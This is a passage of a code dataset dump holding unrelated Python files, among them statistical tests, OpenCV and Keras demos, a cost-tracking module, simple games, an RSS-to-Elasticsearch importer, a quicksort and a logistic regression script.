test_0_stats(self):\n N = 100000\n p_n = 1.0/N\n x = self.rnd_stream.get_samples(N)\n p_x = {}\n for x_i in x[0,:]:\n if x_i not in p_x:\n p_x[x_i] = 0.0\n p_x[x_i] += p_n\n \n y = self.rnd_stream.weights['weights']\n error = [np.sqrt((1.0-v)*v/N) for v in y[0]]\n t_2sigma_test = [np.abs(y[0][k]-v)<=2*error[k] for k,v in p_x.items()]\n\n self.assertTrue(np.all(t_2sigma_test))\n\n def test_i_stats(self):\n N = 100000\n w = self.rnd_stream.weights['weights']\n p_n_i = 1.0/(N*w[0]) \n\n x = self.rnd_stream.get_samples(N)\n n_columns = len(x[:,0]) - 1\n\n p = {}\n N_i = {}\n for x in np.transpose(x):\n x_0 = x[0]\n if x_0 not in p:\n p[x_0] = []\n N_i[x_0] = 0\n for i in range(n_columns):\n p[x_0].append({})\n N_i[x_0] += 1\n for x_i,y in enumerate(x[1:]):\n if y not in p[x_0][x_i]:\n p[x_0][x_i][y] = 0\n p[x_0][x_i][y] += p_n_i[x_0]\n\n np_p = [[]]*(len(p)+1)\n for i, p_i in p.items():\n np_p_i = []\n for p_ij in p_i:\n p_ij_list = [0.0]*(max(p_ij)+1)\n for k in p_ij:\n p_ij_list[k] = p_ij[k]\n np_p_i.append(np.array(p_ij_list))\n np_p[i]=np_p_i\n p = np_p\n\n t_scores = []\n for i, (w_i, p_i) in enumerate(zip(w[1:],p)):\n for w_ij, p_ij in zip(w_i, p_i):\n delta = abs(w_ij - p_ij)\n error = [np.sqrt((1.0-v)*v/(N_i[i])) for v in w_ij]\n t_2sigma_test = [d_i/e_i for d_i,e_i in zip(delta,error)]\n t_scores.extend(t_2sigma_test)\n\n n_scores = len(t_scores)\n n_2outliers = len([x for x in t_scores if x>2.0])\n percent_2outliers = 1.0*n_2outliers/n_scores\n self.assertTrue(percent_2outliers<=0.05)\n\n n_1outliers = len([x for x in t_scores if x>1.0])\n percent_1outliers = 1.0*n_1outliers/n_scores\n 
self.assertTrue(percent_1outliers<=0.32)\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_correlated_weighted_categorical_streams.py","file_name":"test_correlated_weighted_categorical_streams.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"286272264","text":"import cv2 as cv\r\nimport numpy as np\r\n\r\nRED = (0, 0, 255)\r\nGREEN = (0, 255, 0)\r\nBLUE = (255, 0, 0)\r\nCYAN = (255, 255, 0)\r\nMAGENTA = (255, 0, 255)\r\nYELLOW = (0, 255, 255)\r\nWHITE = (255, 255, 255)\r\n\r\ncolors = (RED, GREEN, BLUE, CYAN, MAGENTA, YELLOW, WHITE)\r\np0, p1 = (100, 30), (400, 90)\r\n\r\ndef trackbar(x):\r\n color = colors[x]\r\n img[:] = 0\r\n cv.line(img, p0, p1, color, 10)\r\n cv.imshow('window', img)\r\n\r\nimg = np.zeros((100, 500, 3), np.uint8)\r\ncv.line(img, p0, p1, RED, 10)\r\ncv.imshow('window', img)\r\ncv.createTrackbar('color', 'window', 0, 6, trackbar)\r\n\r\ncv.waitKey(0)\r\ncv.destroyAllWindows()","sub_path":"DrawingShapes_Part3.py","file_name":"DrawingShapes_Part3.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"45341908","text":"\"\"\"\nПредсказывание одной цифры из MNIST\n\"\"\"\n\nimport numpy as np\nimport random as r\n\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense\nfrom keras.utils import np_utils\nfrom keras.models import load_model\n\n# the data, shuffled and split between tran and test sets\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nX_train = X_train.reshape(60000, 784)\nX_test = X_test.reshape(10000, 784)\nX_train = X_train.astype(\"float32\")\nX_test = X_test.astype(\"float32\")\nX_train /= 255\nX_test /= 255\nprint(X_train.shape[0], 'train samples')\nprint(X_test.shape[0], 'test samples')\n\nmodel = load_model(\"mnist_model.h5\")\n\n\"\"\" Пробуем предсказать \"\"\"\nour_images = X_train[r.randrange(0, 60000)]\nfrom matplotlib import pyplot as plt\nplt.imshow(our_images.reshape((28,28)))\n\n#our_images = our_images.astype(\"float32\")\nresult = np.ndarray.flatten(model.predict(our_images.reshape(1, 784)))\nprint('Prediction:')\nprint('This is 0 - ' + str(result[0]*100) + ' %')\nprint('This is 1 - ' + str(result[1]*100) + ' %')\nprint('This is 2 - ' + str(result[2]*100) + ' %')\nprint('This is 3 - ' + str(result[3]*100) + ' %')\nprint('This is 4 - ' + str(result[4]*100) + ' %')\nprint('This is 5 - ' + str(result[5]*100) + ' %')\nprint('This is 6 - ' + str(result[6]*100) + ' %')\nprint('This is 7 - ' + str(result[7]*100) + ' %')\nprint('This is 8 - ' + str(result[8]*100) + ' %')\nprint('This is 9 - ' + str(result[9]*100) + ' %')\n\n#это выводит картинку на экран\nplt.show()","sub_path":"keras-perceptron/example1_PredictOneSample.py","file_name":"example1_PredictOneSample.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"286359266","text":"from nodeconductor.cost_tracking import CostTrackingStrategy, ConsumableItem\n\nfrom . 
import models, ApplicationTypes, OsTypes, SupportTypes, PriceItemTypes\n\n\nclass InstanceStrategy(CostTrackingStrategy):\n resource_class = models.Instance\n\n class Types(object):\n FLAVOR = PriceItemTypes.FLAVOR\n LICENSE_APPLICATION = PriceItemTypes.LICENSE_APPLICATION\n LICENSE_OS = PriceItemTypes.LICENSE_OS\n SUPPORT = PriceItemTypes.SUPPORT\n\n @classmethod\n def get_consumable_items(cls):\n for os, name in OsTypes.CHOICES:\n yield ConsumableItem(item_type=cls.Types.LICENSE_OS, key=os, name='OS: %s' % os)\n\n for key, name in ApplicationTypes.CHOICES:\n yield ConsumableItem(\n item_type=cls.Types.LICENSE_APPLICATION, key=key, name='Application: %s' % name)\n\n for key, name in SupportTypes.CHOICES:\n yield ConsumableItem(item_type=cls.Types.SUPPORT, key=key, name='Support: %s' % name)\n\n for flavor_name in set(models.Flavor.objects.all().values_list('name', flat=True)):\n yield ConsumableItem(item_type=cls.Types.FLAVOR, key=flavor_name, name='Flavor: %s' % flavor_name)\n\n @classmethod\n def get_configuration(cls, instance):\n States = models.Instance.States\n RuntimeStates = models.Instance.RuntimeStates\n tags = [t.name for t in instance.tags.all()]\n\n consumables = {}\n for type in (cls.Types.LICENSE_APPLICATION, cls.Types.LICENSE_OS, cls.Types.SUPPORT):\n try:\n key = [t.split(':')[1] for t in tags if t.startswith('%s:' % type)][0]\n except IndexError:\n continue\n consumables[ConsumableItem(item_type=type, key=key)] = 1\n\n if instance.state == States.OK and instance.runtime_state == RuntimeStates.ACTIVE:\n consumables[ConsumableItem(item_type=cls.Types.FLAVOR, key=instance.flavor_name)] = 1\n return consumables\n\n\nclass VolumeStrategy(CostTrackingStrategy):\n resource_class = models.Volume\n\n class Types(object):\n STORAGE = PriceItemTypes.STORAGE\n\n class Keys(object):\n STORAGE = '1 GB'\n\n @classmethod\n def get_consumable_items(cls):\n return [ConsumableItem(item_type=cls.Types.STORAGE, key=cls.Keys.STORAGE, name='1 GB of storage', units='GB')]\n\n @classmethod\n def get_configuration(cls, volume):\n return {ConsumableItem(item_type=cls.Types.STORAGE, key=cls.Keys.STORAGE): float(volume.size) / 1024}\n\n\nclass SnapshotStrategy(CostTrackingStrategy):\n resource_class = models.Snapshot\n\n class Types(object):\n STORAGE = PriceItemTypes.STORAGE\n\n class Keys(object):\n STORAGE = '1 GB'\n\n @classmethod\n def get_consumable_items(cls):\n return [ConsumableItem(item_type=cls.Types.STORAGE, key=cls.Keys.STORAGE, name='1 GB of storage', units='GB')]\n\n @classmethod\n def get_configuration(cls, snapshot):\n return {ConsumableItem(item_type=cls.Types.STORAGE, key=cls.Keys.STORAGE): float(snapshot.size) / 1024}\n","sub_path":"src/nodeconductor_openstack/openstack_tenant/cost_tracking.py","file_name":"cost_tracking.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"564291350","text":"# Implement a class to hold room information. This should have name and\n# description attributes.\n\n\n# Maybe refactor code so that the internal state representation of a\n# list of items can be more easily accessed. 
This could build out\n# into an inventory object which is subclassed by both the room object, and the \n# player object.\n\n# it would be a \"has-a\" relationship.\n\nclass Room():\n def __init__(self, name, description, items=None):\n self.name = name\n self.description = description\n self.n_to = None\n self.s_to = None\n self.e_to = None\n self.w_to = None \n if items == None:\n self.items = []\n else: \n self.items = items\n\n def add_item(self,item):\n self.items.append(item)\n \n def add_items(self,items):\n for i in items:\n self.items.append(i)\n\n def get_items(self):\n room_items = self.items\n self.items=[]\n return room_items\n \n def get_item(self,name):\n item_names = []\n for i in self.items:\n item_names.append(i.name)\n if name in item_names:\n # The position of the item in the main object list\n list_position = item_names.index(name)\n # Popping the object from the list and returning it \n return self.items.pop(list_position)\n else:\n print(f\"Hmm strange... There is no {name} here\\n\")\n pass\n \n def get_all(self):\n out_list = self.items\n self.items = []\n return out_list\n \n def list_items(self):\n if len(self.items)>0:\n items_list = []\n for i in self.items:\n items_list.append(i.name)\n str_rep = (',').join(items_list)\n print(f'Here are the items in this room: {str_rep}\\n')\n else:\n print('There are no items in this room\\n') \n pass \n\n def __str__(self):\n str_rep = f'You are now in the {self.name} room.\\n\\n{self.description}\\n'\n return str_rep\n ","sub_path":"src/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"359041114","text":"import typing\n\nfrom .baselines import (\n AutoSklearnMetalearner, LinearRegressionBaseline, MeanBaseline, MedianBaseline, MetaAutoSklearn,\n PerPrimitiveBaseline, RandomBaseline, RandomForestBaseline, MLPRegressionModel\n)\nfrom .dna_regression_model import DNARegressionModel\nfrom .lstm_model import LSTMModel\nfrom .dag_lstm_regression_model import DAGLSTMRegressionModel\nfrom .hidden_dag_lstm_regression_model import HiddenDAGLSTMRegressionModel\nfrom .attention_regression_model import AttentionRegressionModel\nfrom .dag_attention_regression_model import DAGAttentionRegressionModel\nfrom .probabilistic_matrix_factorization import ProbabilisticMatrixFactorization\n\n\nclass ModelNotFitError(Exception):\n pass\n\n\ndef get_model_class(model_id: str):\n return {\n 'dna_regression': DNARegressionModel,\n 'mean_regression': MeanBaseline,\n 'median_regression': MedianBaseline,\n 'per_primitive_regression': PerPrimitiveBaseline,\n 'autosklearn': AutoSklearnMetalearner,\n 'lstm': LSTMModel,\n 'daglstm_regression': DAGLSTMRegressionModel,\n 'hidden_daglstm_regression': HiddenDAGLSTMRegressionModel,\n 'attention_regression': AttentionRegressionModel,\n 'dag_attention_regression': DAGAttentionRegressionModel,\n 'linear_regression': LinearRegressionBaseline,\n 'random_forest': RandomForestBaseline,\n 'mlp_regression': MLPRegressionModel,\n 'random': RandomBaseline,\n 'meta_autosklearn': MetaAutoSklearn,\n 'probabilistic_matrix_factorization': ProbabilisticMatrixFactorization,\n }[model_id.lower()]\n\n\ndef get_model(model_id: str, model_config: typing.Dict, seed: int):\n model_class = get_model_class(model_id)\n init_model_config = model_config.get('__init__', {})\n return model_class(**init_model_config, 
seed=seed)\n","sub_path":"dna/models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"268509629","text":"import random\r\nmovies = [\"sadak 2\", \"bhag milkha bhag\", \"raabta\", \"avengers age of ultron\", 'judwa 2', \"endgame\", '3 idiots', '_']\r\nprint(\"Hangman Game Movies\")\r\n\r\n \r\np = random.randint(0, len(movies)-2)\r\nmovie_selected = movies[p]\r\nfor x in movie_selected:\r\n if x.isalpha() or x.isdigit():\r\n print('_ ', end='')\r\n else:\r\n print(' ', end='')\r\nprint()\r\nlives = 10\r\nwords_guessed_correct = []\r\nno_of_words_guessed = 0\r\ndistinct_words = []\r\nfor _ in movie_selected:\r\n if _ not in distinct_words and _ != ' ':\r\n distinct_words.append(_)\r\n\r\nwhile True:\r\n if lives == 0:\r\n print(\"you lost all your lives\")\r\n print(\"Game Over\")\r\n break\r\n if len(words_guessed_correct) == len(distinct_words):\r\n print()\r\n print(\"Congrats you won!! Game Over\")\r\n break\r\n print()\r\n print(f\"You have {lives} lives left\".format(lives))\r\n ans = input()\r\n if ans in distinct_words:\r\n print(\"You guessed a word\")\r\n # print(distinct_words, words_guessed_correct)\r\n if ans not in words_guessed_correct:\r\n words_guessed_correct.append(ans)\r\n for x in movie_selected:\r\n if x in words_guessed_correct:\r\n print(x, end=' ')\r\n elif x == ' ':\r\n print(' ', end=' ')\r\n else:\r\n print(movies[-1], end=' ')\r\n else:\r\n print(\"wrong word, try again\")\r\n lives -= 1\r\n","sub_path":"guessthemovie.py","file_name":"guessthemovie.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"374614439","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 19 21:24:25 2017\n\n@author: mike\n\"\"\"\n\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split as tts\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.metrics import accuracy_score\nfrom matplotlib.colors import ListedColormap\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\niris = datasets.load_iris()\nX = iris.data[:, [2,3]]\ny = iris.target\n\n# Subset data set to only classes 0,1\nX_01 = X[(y==0) | (y==1)]\ny_01 = y[(y==0) | (y==1)]\nprint('Class labels:', np.unique(y_01))\nX_train, X_test, y_train, y_test = tts(X_01,y_01,test_size=0.3, random_state=1, stratify=y_01)\n\n\n# Split original data into train/test sets with equal proportions of each class\n#print('Class labels:', np.unique(y))\n#X_train, X_test, y_train, y_test = tts(X,y,test_size=0.3, random_state=1, stratify=y)\n\n\nprint('Label counts in y:', np.bincount(y))\nprint('Label counts in y_train:', np.bincount(y_train))\nprint('Label counts in y_test:', np.bincount(y_test))\n\n\n# Apply feature scaling to standardize the train/test sets. 
(Both use mu/sigma from training)\nprint('Applying standardization to data set')\nsc = StandardScaler()\nsc.fit(X_train)\nX_train_std = sc.transform(X_train)\nX_test_std = sc.transform(X_test)\n\n# Train Logistic Regression classified\n#lrgd = LogisticRegressionGD(n_iter=40, eta=0.1, random_state=1) # Py ML book\nlrgd = LogisticRegressionGD(n_iter=100, alpha=1.0, random_state=1) # Andrew Ng\nlrgd.fit(X_train_std, y_train)\n\n\n# Make prediction for test set\ny_pred = lrgd.predict(X_test_std)\nprint('Correctly classified samples: %d' % (y_test == y_pred).sum())\nprint('Misclassified samples: %d' % (y_test != y_pred).sum())\nprint('Accuracy: %.2f' % accuracy_score(y_test, y_pred))\n#print('Accuracy: %.2f' % lrgd.score(X_test_std, y_test)) #equivalent to above\n\n\n#Plot costs vs. # iterations to verify convergence\nplt.plot(range(1, len(lrgd.cost_) + 1),lrgd.cost_, marker='o')\nplt.xlabel('Epochs')\nplt.ylabel('Gradient descent cost function')\nplt.title('Convergence of Logistic Regression model')\nplt.show()\n\n\n# Plot data and decision regions\nX_combined_std = np.vstack((X_train_std, X_test_std))\ny_combined = np.hstack((y_train, y_test))\nplot_decision_regions(X=X_combined_std, \n y=y_combined, \n classifier=lrgd, \n test_idx=range(y_train.shape[0],y_train.shape[0]+y_test.shape[0]))\nplt.title('Iris Classification by logistic regression')\nplt.xlabel('petal length (standardized)')\nplt.ylabel('petal width (standardized)')\nplt.legend()\nplt.show()\n\nclass LogisticRegressionGD(object):\n \"\"\"Logistic Regression classifier with gradient descent\n \n Parameters\n ------------\n eta : float\n Learning rate (between 0.0 and 1.0)\n alpha : float\n Learning rate (between 0.0 and 1.0)\n n_iter : int\n Passes over the training dataset.\n random_state : int\n Random number generator seed for random weight\n initialization.\n \n Attributes\n -----------\n w_ : 1d-array\n Weights after fitting.\n cost_ : list\n Sum of squares cost function value in each epoch.\n \"\"\"\n \n def __init__(self, alpha = 2.0, eta=0.05, n_iter=100, random_state=1):\n self.eta = eta #Py ML book\n self.alpha = alpha # Andrew Ng\n self.n_iter = n_iter\n self.random_state = random_state\n\n\n def fit(self, X, y):\n \"\"\"\n Fits training data. Optimizes w_ with gradient descent.\n \n Parameters\n ----------\n X : {array-like}, shape = [n_samples, n_features]\n Training vectors, where n_samples is the number of samples and\n n_features is the number of features.\n y : array-like, shape = [n_samples]\n Target values.\n \n Returns\n -------\n self : object\n \"\"\"\n \n \n # Set up initial values for weights\n rgen = np.random.RandomState(self.random_state)\n self.w_ = rgen.normal(loc=0.0, scale=0.01, size=1 + X.shape[1])\n self.cost_ = []\n m = len(y) # Andrew Ng definition\n\n #Run gradient descent (NOTE: it keeps running through n_iter no matter what)\n for i in range(self.n_iter):\n net_input = self.net_input(X) #scalar\n output = self.sigmoid(net_input) #vector\n errors = (y - output) #vector\n# self.w_[0] += self.eta * errors.sum() #vector; w_[0] is bias unit\n# self.w_[1:] += self.eta * X.T.dot(errors) #vector\n self.w_[0] += (self.alpha / m) * errors.sum() #vector; w_[0] is bias unit\n self.w_[1:] += (self.alpha / m) * X.T.dot(errors) #vector\n cost = self.cost_function(y, output)\n self.cost_.append(cost) #used to verify convergence\n return self\n \n def net_input(self, X):\n \"\"\"Calculate net input. 
This term is z in Andrew Ng's class \"\"\"\n return np.dot(X, self.w_[1:]) + self.w_[0]\n\n def sigmoid (self, z):\n '''Calculate sigmoid function fron net_input (z)''' \n # z values > 250 (or < -250) are clipped at 250\n return 1.0 / (1.0 + np.exp(-np.clip(z,-250,250)))\n \n def cost_function (self,y,output):\n '''Calculate the logistic regression cost function'''\n m = len(y)\n cost = (1/m) * (-y.dot(np.log(output)) - ((1.-y).dot(np.log(1.-output))))\n return cost\n \n def predict(self, X):\n \"\"\"Return class label based on sigmoid function\"\"\"\n \n #Due to shape of sigmoid function, these two options are equivalent\n #return np.where(self.net_input(X) >= 0, 1, 0)\n return np.where(self.sigmoid(self.net_input(X)) >= 0.5, 1, 0)\n \n\n\n\ndef plot_decision_regions(X, y, classifier, test_idx=None, resolution=0.02):\n '''\n Helper function to plot the decision regions.\n '''\n \n # setup marker generator and color map\n markers = ('s', 'x', 'o', '^', 'v')\n colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\n cmap = ListedColormap(colors[:len(np.unique(y))])\n\n # plot the decision surface\n x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\n np.arange(x2_min, x2_max, resolution))\n Z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\n Z = Z.reshape(xx1.shape)\n plt.contourf(xx1, xx2, Z, alpha=0.3, cmap=cmap)\n plt.xlim(xx1.min(), xx1.max())\n plt.ylim(xx2.min(), xx2.max())\n\n # plot class samples\n for idx, cl in enumerate(np.unique(y)):\n plt.scatter(x=X[y == cl, 0], \n y=X[y == cl, 1],\n alpha=0.8, \n c=colors[idx],\n marker=markers[idx], \n label=cl, \n edgecolor='black')\n \n # highlight test samples\n if test_idx:\n # plot all samples\n X_test, y_test = X[test_idx,:], y[test_idx]\n plt.scatter(X_test[:,0], X_test[:,1],\n alpha=1.0, \n c='',\n linewidth = 1,\n marker='o',\n s=100,\n label='test set', \n edgecolor='black')\n","sub_path":"logistic_regression_w_scikit.py","file_name":"logistic_regression_w_scikit.py","file_ext":"py","file_size_in_byte":7353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"321106757","text":"from typing import List\n\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n \"\"\"\n Time: O(2n) => O(n)\n Space: O(2n) => O(n)\n \"\"\"\n\n def nextLargerNodes(self, head: ListNode) -> List[int]:\n result, stack = [], []\n while head:\n while stack and stack[-1][1] < head.val:\n result[stack.pop()[0]] = head.val\n stack.append((len(result), head.val))\n result.append(0)\n head = head.next\n\n return result\n","sub_path":"problems/1019. 
Next Greater Node In Linked List/2 - Use Stack.py","file_name":"2 - Use Stack.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"256951953","text":"import sys\n\nimport dumper\nfrom Elasticsearch_API import ElasticsearchAPI\nfrom config_manager import ConfigManager\n\n\n__author__ = \"Peter Henell\"\n__copyright__ = \"Copyright 2016, Peter Henell\"\n__credits__ = [\"Peter Henell\"]\n__license__ = \"Apache License 2.0\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"Peter Henell\"\n__email__ = \"dnd\"\n__status__ = \"dev\"\n\n# polisen_events = 'https://polisen.se/Stockholms_lan/Aktuellt/RSS/Lokal-RSS---Handelser/Lokala-RSS-listor1/Handelser-RSS---Stockholms-lan/?feed=rss'\npolisen_news = 'https://polisen.se/Stockholms_lan/Aktuellt/RSS/Lokal-RSS---Nyheter/Lokala-RSS-listor1/Nyheter-RSS---Stockholms-lan/?feed=rss'\npolisen_events = 'https://polisen.se/Aktuellt/Handelser/Handelser-i-hela-landet/?feed=rss'\n\n\ndef main(arguments):\n import os.path\n\n if len(arguments) == 0:\n print('Usage: main.py [truncate_data]')\n print('Specify truncate_data if you wish to clear all the data')\n print()\n print('Example usage: main.py localhost.ini')\n print('Example usage: main.py localhost.ini truncate_data')\n exit(2)\n\n settings_file = arguments[0]\n\n if not os.path.isfile(settings_file):\n print('Settings file not found: %s' % settings_file)\n\n config_manager = ConfigManager.from_file(settings_file)\n es = ElasticsearchAPI.from_config_manager(config_manager)\n\n # for stat_collector in stat_collectors:\n if len(arguments) == 2:\n if arguments[1] == 'truncate_data':\n es.delete_index('police_events')\n\n result = dumper.get(polisen_events)\n rssEntries = dumper.parse_to_obj(result)\n\n es.create_index('police_events')\n mapping = {\n \"properties\": {\n \"published\": {\n \"type\": \"date\",\n \"format\": \"date_hour_minute_second\"\n },\n \"title\": {\n \"type\": \"string\",\n \"index\": \"analyzed\"\n },\n \"link\": {\n \"type\": \"string\",\n \"index\": \"analyzed\"\n },\n \"summary\": {\n \"type\": \"string\",\n \"index\": \"analyzed\"\n },\n \"location\": {\n \"type\": \"string\",\n \"index\": \"not_analyzed\"\n },\n \"reported_date\": {\n \"type\": \"string\",\n \"index\": \"not_analyzed\"\n },\n \"report_type\": {\n \"type\": \"string\",\n \"index\": \"not_analyzed\"\n },\n \"location_street\": {\n \"type\": \"string\",\n \"index\": \"not_analyzed\"\n },\n \"location_commune\": {\n \"type\": \"string\",\n \"index\": \"not_analyzed\"\n },\n \"location_region\": {\n \"type\": \"string\",\n \"index\": \"not_analyzed\"\n },\n \"html_body\": {\n \"type\": \"string\",\n \"index\": \"analyzed\"\n },\n }\n }\n es.set_mapping(index_name='police_events', doc_type='events', mapping=mapping)\n\n existing_entries = es.find_ids([r['entry_id'] for r in rssEntries], index_name='police_events', doc_type='events')\n\n new_entries = [e for e in rssEntries if e['entry_id'] not in existing_entries]\n print('Found %i rss items of which %i are new' % (len(rssEntries), len(new_entries)))\n\n # Getting the HTML body only for the new entries to reduce overhear\n for entry in new_entries:\n entry['html_body'] = dumper.get_link_body(entry['link'])\n\n es.consume_all(new_entries, index_name='police_events', doc_type='events', id_column_name='entry_id')\n\n\nif __name__ == '__main__':\n 
main(sys.argv[1:])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"399642359","text":"print(__doc__)\n\nfrom sklearn.preprocessing import normalize\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nimport numpy as np\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import datasets\n\nnp.random.seed(7)\nvector_barrido = []\nmlp = MLPClassifier(solver='lbfgs', early_stopping=False)\ndtc = DecisionTreeClassifier()\ndatos = np.genfromtxt('muestra_datos.csv', delimiter = ';')\nX = (datos[:, :-1])\ny = datos[:, -1]\nfor i in range(25):\n i+=1\n vector_barrido.append(i)\nhiddenlayers = vector_barrido\n\nscores = list()\nscores_std = list()\n# for hl in hiddenlayers:\n# mlp.hidden_layer_sizes = hl\n# this_scores = cross_val_score(mlp, X, y, n_jobs=1)\n# scores.append(np.mean(this_scores))\n# scores_std.append(np.std(this_scores))\nfor maxleaf in hiddenlayers:\n dtc.max_leaf_nodes=maxleaf+1\n this_scores = cross_val_score(dtc, X, y, n_jobs=1)\n scores.append(np.mean(this_scores))\n scores_std.append(np.std(this_scores))\n# Do the plotting\nimport matplotlib.pyplot as plt\nplt.figure(1, figsize=(4, 3))\nplt.clf()\nplt.plot(hiddenlayers, scores,label='CV score')\nplt.plot(hiddenlayers, np.array(scores) + np.array(scores_std), 'b--',label='CV máx score')\nplt.plot(hiddenlayers, np.array(scores) - np.array(scores_std), 'b--',label='CV min score')\nlocs,labels = plt.yticks()\nplt.legend()\nplt.yticks(locs, list(map(lambda x: \"%g\" % x, locs)))\nplt.ylabel('Valoración CV')\nplt.xlabel('Número de Nodos')\nplt.ylim(0, 1.1)\nplt.show()\n","sub_path":"CrossValidation-Metrics/CrossVal_plotCVdigits2.py","file_name":"CrossVal_plotCVdigits2.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"77597450","text":"__author__ = \"\"\n__copyright__ = \"Licensed under GPLv2 or later.\"\n\nfrom dataStore.lepdClient.LepdClient import LepdClient\nfrom dataStore.influxDbUtil.dbUtil import MyInfluxDbClient\nimport re\n\nimport time\n\n'''\nfetch data related to GetCmdIotop from lepd by lepdClient and \nstore the returned data into the influxDB by influxDBClient.\n'''\ndef pullAndStoreGetCmdIotop(lepdClient, influxDbClient):\n res = lepdClient.sendRequest('GetCmdIotop')\n # print(res)\n\n str1 = res[\"result\"].split(\"\\n\")\n\n data=re.findall(r\"\\d+\\.?\\d*\", str1[0])\n\n # print(data)\n json_body = [\n {\n\n \"measurement\": \"GetCmdIotop\",\n \"tags\": {\n # the address of lepd\n \"server\": lepdClient.server\n },\n # \"time\": \"2017-03-12T22:00:00Z\",\n \"fields\": {\n \"Total_DISK_READ\": float(data[0]),\n \"Total_DISK_WRITE\": float(data[1])\n }\n }\n ]\n\n influxDbClient.write_points(json_body)\n\n\nif (__name__ == '__main__'):\n lepdClient = LepdClient('localhost')\n influxDbClient = MyInfluxDbClient('localhost')\n for i in range(120):\n pullAndStoreGetCmdIotop(lepdClient, influxDbClient)\n # time.sleep(0.3)\n","sub_path":"dataStore/modules/others/pullAndStoreGetCmdIotop.py","file_name":"pullAndStoreGetCmdIotop.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"479878408","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom sitemgr.sitemgr.settings import 
INSTALLED_APPS\n\npattern_list=[\n '',\n # Examples:\n # url(r'^$', 'mysite.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n #url(r'^$', \"mainpage.views.index\"),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^auth/', include(\"django.contrib.auth.urls\")),\n url(r'^$', include(\"mainpage.urls\")),\n ]\n\nfor app in INSTALLED_APPS:\n if not app.startswith('django.contrib'):\n pattern_list.append(url('^%s/'%(app),include(\"%s.urls\"%(app),\n namespace=app)))\n\nurlpatterns = patterns(*(pattern_list))\n","sub_path":"sitemgr/sitemgr/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"479190969","text":"import random\ndef qc(lst, low, high):\n if low < high:\n stack = [low,high]\n while stack:\n right = stack.pop()\n left = stack.pop()\n\n mid = partition(lst, left, right)\n if left < mid - 1:\n stack.append(left)\n stack.append(mid-1)\n if right > mid + 1:\n stack.append(mid+1)\n stack.append(right) \n\ndef partition(lst, low, high):\n i = low - 1 \n for j in range(low, high):\n if lst[j] <= lst[high]:\n i = i + 1\n lst[i], lst[j] = lst[j], lst[i]\n lst[high],lst[i+1] = lst[i+1],lst[high]\n return i + 1\n\n\na = []\nfor _ in range(20):\n a.append(random.randint(0,200))\nqc(a,0,len(a) - 1)\nprint(a)\n\n","sub_path":"practice/practice_4/qicktsort2.py","file_name":"qicktsort2.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"571714990","text":"# Agregar Articulos\n# Remover Articulos\n# Ver Articulos\n\nlista_articulos = list()\n\n\ndef agregar_articulo():\n articulo = input(\"Nombre del articulo a agregar: \")\n lista_articulos.append(articulo.capitalize())\n\n\ndef remover_articulo():\n articulo = input(\"Articulo a remover: \")\n lista_articulos.remove(articulo.capitalize())\n\n\ndef ver_articulo():\n for articulo in lista_articulos:\n print(articulo)\n\n\nwhile True:\n print(\"Estas son las opciones que puedes seleccionar\")\n print(\"1- Agregar articulo\")\n print(\"2- Remover Articulos\")\n print(\"3- Ver lista\")\n print(\"4- Salir\")\n\n operacion = int(input(\": \"))\n if operacion == 1:\n agregar_articulo()\n elif operacion == 2:\n 